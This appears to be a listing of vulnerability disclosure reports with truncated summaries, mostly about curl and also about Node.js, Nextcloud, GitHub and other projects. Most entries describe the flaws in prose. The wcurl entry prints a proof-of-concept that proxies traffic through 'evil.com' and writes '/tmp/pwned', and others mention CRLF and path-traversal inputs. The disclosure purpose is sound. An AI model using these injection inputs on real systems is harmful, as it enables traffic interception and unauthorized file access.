Monero: Inverted ternary in peerlist_manager::filter() allows unlimited whitelist entries per host via different ports
The peerlist_manager::filter function in the Monero project's p2p/net_peerlist.h file contained an incorrect ternary operator that operated on the wrong peer list. When called with 'white=true', it filtered the gray list instead of the white list. As a result, a single host could accumulate unlimit...
Node.js: Assertion error in node_url.cc via malformed URL format leads to Node.js crash
An assertion error in node_url.cc via a malformed URL format leads to a Node.js crash. A flaw in the URL processing caused an assertion failure in the native code when url.format was called with a malformed internationalized domain name containing invalid characters, crashing the Node.js process. Th...
Basecamp: Improper Access Control in `fizzy.do` import flow allows cross-tenant ActionText reference resolution and data disclosure
The vulnerability allowed for cross-tenant ActionText reference resolution and data disclosure during the account import flow. The import process did not properly verify the ownership of the referenced records before minting signed global IDs, enabling an attacker to access and disclose data from...
RubyGems: Server-side ReDoS via user-controlled regex in OIDC Access Policy
The OIDC Access Policy implementation evaluated user-supplied regular expressions against JWT claim values using Ruby's Regexp engine without any timeout or complexity validation. The vulnerable code path was Regexp.new(value).match?(claimvalue), where value was fully user-controlled and claimvalue w...
Node.js: Timing side-channel in HMAC verification via memcmp() in crypto_hmac.cc leads to potential MAC forgery
Vulnerability description not provided...
Node.js: Memory leak in Node.js HTTP/2 server via WINDOW_UPDATE on stream 0 leads to resource exhaustion
Vulnerability description not provided...
curl: MQTT Protocol Packet Injection via Unchecked CONNACK Remaining Length
I'm not sure if this is a vulnerability or intended behavior, but I noticed that curl's MQTT implementation accepts CONNACK packets with Remaining Length values greater than 2, which appears to violate the MQTT v3.1.1 specification. According to the MQTT spec, CONNACK packets should have a Remainin...
GitHub: Add labels to arbitrary issues/prs & compromise github actions label checks
A vulnerability was identified that allowed a user with read access to a repository and write access to a project to modify issue and pull request metadata through the project. When adding an item to a project that already existed, column value updates were applied without verifying the actor's...
Fastify: DoS via Unbounded Memory Allocation in sendWebStream on Fastify v5.7.0+ leads to OOM crash when backpressure is ignored
A vulnerability was discovered in Fastify versions 5.7.0 and later. The issue was in the "sendWebStream" function, which failed to handle TCP backpressure correctly. When a ReadableStream was sent as a response, Fastify continuously pulled data from the stream producer and wrote it to the respons...
curl: wcurl Argument Injection via Unquoted Variable
When I was code auditing curl I stumbled upon a vulnerability that was in wcurl. Affected version: current. Step 1: open terminal. Step 2: run the PoCs below: wcurl --dry-run --curl-options='-x http://evil.com:8080 -o /tmp/pwned' https://example.com/test.txt wcurl --dry-run --curl-options='-o...
Tucows (VDP): Password Strength Policy Bypass via Server-Side Validation Flaw
A password strength policy bypass was discovered due to a server-side validation flaw. The password strength policy was only enforced in the browser, not on the server side...
curl: Integer Underflow in src/var.c
Summary: A potential Integer Underflow vulnerability was identified in the setvariable function within src/var.c. The flaw occurs during the calculation of the variable content length (clen) when a byte range is specified. Specifically, the code fails to validate if startoffset is greater than...
GitHub: PATs without the required scope can leak issues
An Incorrect Authorization vulnerability was identified in GitHub Enterprise Server that allowed an authenticated user with a classic personal access token (PAT) lacking the repo scope to retrieve issues and commits from private and internal repositories via the search REST API endpoints. The user...
Nextcloud: View-only guests could see deleted Collectives pages in the trashbin
A vulnerability was discovered where view-only guests could see deleted Collectives pages in the trashbin...
Nextcloud: IDOR on ██████ via direct photo URL leads to unauthorized access to deleted and other users' photos
Summary: An Insecure Direct Object Reference (IDOR) vulnerability exists in the application that allows unauthorized access to photos belonging to other users. The application does not properly validate whether the logged-in user is authorized to access a photo when accessing it via direct URL. Thi...
Weblate: Argument Injection in /manage/ssh/ via host parameter leads to sensitive file disclosure on Weblate
A vulnerability was discovered in the SSH management interface of Weblate, a web-based translation tool. The vulnerability allowed an attacker with administrative privileges to inject command-line arguments into the host parameter, leading to sensitive file disclosure on the server. The vulnerabl...
curl: SSL options ISSUERCERT, EC_CURVES and CRLFILE silently ignored by non-OpenSSL backends
Summary: The SSL options ISSUERCERT, EC_CURVES and CRLFILE are silently ignored for e.g. the mbedTLS backend, which allows MITM attacks for the ISSUERCERT and CRLFILE bug, and can reduce security and compliance by ignoring the specified curve for the EC_CURVES bug. Affected version: Tested with...
curl: Cross‑origin cookies leak and injection risk when using a custom Host header
Summary: When a custom hostname is specified, it is used for cookie matching if the cookie engine is also enabled for this transfer. This matching persists across cross-origin redirects even though the originally supplied hostname is removed. cookiehost is set from a custom Host header: lib/http.c...
curl: Cookie Replacement Use-After-Free Vulnerability
Summary: The cookie replacement logic in lib/cookie.c contains a use-after-free vulnerability in the replaceexisting function. The function modifies a linked list while iterating over it, creating potential for memory corruption in concurrent or complex cookie operations. Vulnerable Code Location...
curl: Cookie Max-Age Integer Overflow Vulnerability
Summary: The cookie parsing code in lib/cookie.c contains an integer overflow vulnerability when processing the Max-Age attribute of HTTP cookies. The vulnerable code attempts to add the max-age value to the current timestamp without adequate overflow protection. While the code includes an overflo...
Sony: Improper State Validation on Sony WH-CH520 via BLE Command Service leads to unauthorized Bluetooth pairing and audio hijacking
A vulnerability was discovered in the firmware of the Sony WH-CH520 headset. The vulnerability allowed an unauthenticated write to a proprietary Sony command service via Bluetooth Low Energy (BLE), causing the device to become discoverable and accept a standard Bluetooth Security Manager Protocol S...
curl: libcurl: Improper Authentication State Management on Cross-Protocol Redirects
Following the recent advisory for CVE-2025-14524, I conducted an investigation into how libcurl manages OAuth2 credentials during complex redirect chains. I have confirmed that while the library successfully protects traditional user credentials, it fails to clear OAuth2 Bearer tokens in the same...
AWS VDP: Password Reuse Vulnerability on AWS Sign-in Page via Password Reset Flow leads to Security Policy Violation
Asset URL: ██████ Summary: The AWS sign-in page allows users to reuse old passwords when resetting their password, which violates security best practices outlined in OWASP Authentication Cheat Sheet and NIST 800-63B Digital Identity Guidelines. This misconfiguration could potentially weaken accou...
Nextcloud: Private circle can be added to another circle via API despite visibility restriction
A vulnerability was discovered where private circles could be added to other circles via the API, despite visibility restrictions...
Node.js: HashDoS in V8
Vulnerability description not provided...
Cosmos: Memory Exhaustion in CometBFT v1.0.1 via malicious ProposalMessage leads to network-wide denial of service
Summary of Impact CometBFT v1.0.1 contains a critical memory exhaustion vulnerability that allows any peer to crash nodes with a single 50-byte P2P message. An attacker can send a malicious ProposalMessage with PartSetHeader.Total set to 2^32-1, causing the receiving node to immediately allocate...
GoCD: Information Disclosure via Logback Configuration Injection in GoCD Agent
Summary: The GoCD Agent's logging mechanism (Logback) allows for property substitution and custom configuration loading. By default, the config directory might not exist in the installation path. However, if an attacker creates this directory and places a specially crafted agent-launcher-logback.xml...
curl: Directory listing vulnerability is disclosing names and emails, widespread (thousands of records, publicly accessible without auth)
Summary: A directory listing vulnerability is disclosing names, emails and a great deal of other sensitive information, which significantly increases the severity because these are considered PII (Personally Identifiable Information). Thousands of records, publicly accessible without auth, also can be...
curl: IMAP Protocol Desynchronization and Response Smuggling via Naive Literal Parsing
libcurl incorrectly parses IMAP literal sizes even when they are embedded within quoted strings (e.g., email subjects or headers). This behavior violates RFC 3501, which mandates that content inside double quotes must be treated as opaque text. This parsing error causes the client state machine to...
curl: MQTT: unsigned integer underflow bypasses MAX_MQTT_MESSAGE_SIZE check
Summary: An unsigned integer underflow exists in libcurl's MQTT publish path. Due to incorrect arithmetic ordering in the size validation logic, oversized MQTT PUBLISH messages are not rejected as intended. Affected version: libcurl 8.18.0. Tested on macOS arm64 with AddressSanitizer enabled. Steps ...
curl: Digest Authentication Header Injection
Summary: The Digest authentication implementation in libcurl fails to properly escape the uri parameter in the Authorization header. While other parameters like username, realm, and nonce are correctly escaped using auth_digest_string_quoted, the uri is inserted raw into the header. This allows an...
curl: Gopher Protocol Command Injection (SSRF Smuggling)
Summary: The curl Gopher protocol handler is vulnerable to command injection through URL-encoded CRLF sequences in the path. This allows an attacker to "smuggle" additional Gopher selectors or arbitrary commands into a single Gopher request. By using %0d%0a in the URL, an attacker can break the...
curl: Use-After-Free in curl_easy_nextheader when reusing header handle across requests
The API returns struct curl_header objects that internally reference libcurl-owned linked list nodes. When a new request is performed on the same CURL handle, libcurl frees and rebuilds the internal header list, but previously returned struct curl_header objects remain valid to the application an...
curl: integer Overflow in MQTT Protocol Handling Allows Bypassing Message Size Limit
Summary: A logic error involving an integer overflow (specifically, an unsigned integer underflow) exists in the lib/mqtt.c file within the mqttpublish function. This vulnerability allows an attacker or a malicious user configuration to bypass the explicit MAX_MQTT_MESSAGE_SIZE check. The vulnerabilit...
curl: Integer-underflow leads to heap over-read in TFTP implementation
libcurl on commit 3ee1d3b573e6ea36fb478dbd0d9913483b900928 contains a vulnerability in its TFTP implementation that can cause curl or a libcurl-user to send heap memory beyond the bounds of an allocated chunk to a malicious TFTP server. The vulnerability lies in lib/tftp.c, in function...
MetaMask: Authorization Bypass in Starknet Snap via enableAuthorize parameter leads to unauthorized transaction signing
A critical security vulnerability was discovered in the Starknet Snap by Consensys. The vulnerability allowed malicious websites to bypass user authorization when signing messages or transactions. The vulnerability existed in the enableAuthorize parameter, which could be controlled by any website...
GitHub: Missing Access Control in MigrationFile allows attacker to upload files to any Migration
A Missing Authorization vulnerability was identified in GitHub Enterprise Server that allowed unauthorized content to be uploaded to a user's repository migration export due to a missing authorization check in the repository migration upload endpoint. The vulnerability could be exploited by...
curl: Heap Out-of-Bounds Read in lib/http2.c via Malformed PUSH_PROMISE Headers
Summary: A heap-based out-of-bounds read vulnerability exists in libcurl's HTTP/2 implementation. The on_header callback in lib/http2.c incorrectly treats header names and values provided by nghttp2 as null-terminated C-strings. Specifically, passing these pointers to curl_maprintf with the %s forma...
curl: CRLF Injection in HTTP header values allows arbitrary header injection
curl allows carriage return (\r) and line feed (\n) characters inside HTTP header values. When attacker-controlled data is used in a header value (e.g., Authorization: Bearer), curl constructs and sends a malformed HTTP request containing injected headers. This violates HTTP specification RFC 7320 /RFC...
curl: Inconsistent Rejection Logic in file:// URLs with Authority
curl's file:// protocol handler inconsistently applies path sanitization. It rejects file://../ as "Bad file:// URL" but allows the same traversal when an authority/host (e.g., localhost) is present: file://localhost/../. This inconsistency misleads developers who rely on the bad file:// URL error for...
curl: Stack Buffer Overflow in mprintf.c formatting function (fallback path)
Summary: A stack-based buffer overflow exists in mprintf.c within the outdouble function. This vulnerability affects builds where HAVE_SNPRINTF is undefined, forcing the use of the legacy sprintf function. The logic responsible for calculating the maximum safe precision (maxprec) for floating-point...
Nextcloud: Authentication Bypass in ID4me handling via Missing JWT Signature Verification in User OIDC
An authentication bypass vulnerability was discovered in the ID4me handling in the OIDC implementation. The vulnerability was caused by missing JWT signature verification for user authentication...
curl: MQTT: Missing upper bound on incoming Remaining Length allows server-controlled long wait
Curl's MQTT implementation accepts any valid Remaining Length advertised by the server without an explicit upper bound beyond the MQTT spec maximum of 268,435,455 bytes. A malicious server can send a PUBLISH packet claiming this maximum size but provide only minimal payload, causing curl to wait...
curl: State Isolation Failure in Multiplexed Connections (Shared Auth Context)
Vulnerability: State Isolation Failure in Multiplexed Connections (Shared Auth Context). Product: libcurl. Affected Versions: v7.43.0 - Current (v8.x), all versions supporting HTTP/2 Multiplexing. Severity: CRITICAL. CVSS: 9.1. 1. Executive Summary: A fundamental design flaw exists in libcurl's state...
Nextcloud: SVG filter primitives bypass remote image blocking, enabling email tracking without consent.
A vulnerability was discovered in the HTML sanitizer of the Roundcube webmail application. The sanitizer did not properly handle the SVG filter primitive, allowing external resources to be loaded even when the "Block remote images" setting was enabled. This vulnerability could be used to track...
curl: Path Traversal in curl file:// Protocol Handler Allows Unauthorized File Access
Summary: During my manual review of the file path handling logic in curl's source code, I noticed the absence of proper validation for directory traversal sequences, which I then verified through practical testing. I discovered that curl allows unauthorized access to arbitrary files through the...
curl: Alt-Svc bypasses credential leak protection (CVE-2018-1000007)
Summary: I found a bug where curl's Alt-Svc implementation fails to strip sensitive authentication headers (Authorization and Cookies) when remapping a connection to a different host or port. This essentially bypasses the security fix for CVE-2018-1000007. While auditing the code, I noticed that...
8x8: jitsi-call-analytics: Unauthenticated arbitrary file write via path traversal in `/api/v1/uploads/analyze`
A path traversal vulnerability was discovered in the /api/v1/uploads/analyze endpoint of the jitsi-call-analytics backend. The vulnerability allowed unauthenticated users to write files within the configured RTCSTATSDOWNLOADSPATH directory. The issue was caused by the upload handler using...
curl: CRLF Injection in Gopher Protocol (`lib/gopher.c`)
Control characters slip through during URL handling in curl's Gopher setup. Though null bytes get blocked by the REJECT_ZERO setting, carriage returns and line feeds remain permitted. A specially built address using percent-encoded line breaks (like %0D%0A) opens room for command insertion. Because of how...
curl: HTTP Request Smuggling and SSRF via CRLF Injection in Curl_add_custom_headers
Summary: A lack of CRLF validation in Curl_add_custom_headers at lib/http.c:1761 allows users to inject arbitrary HTTP headers. This violation of RFC 7230 §3.2.4 leads to HTTP Request Smuggling and potential SSRF bypass. AI Disclosure: I utilized an AI assistant to aid in the initial code analysis a...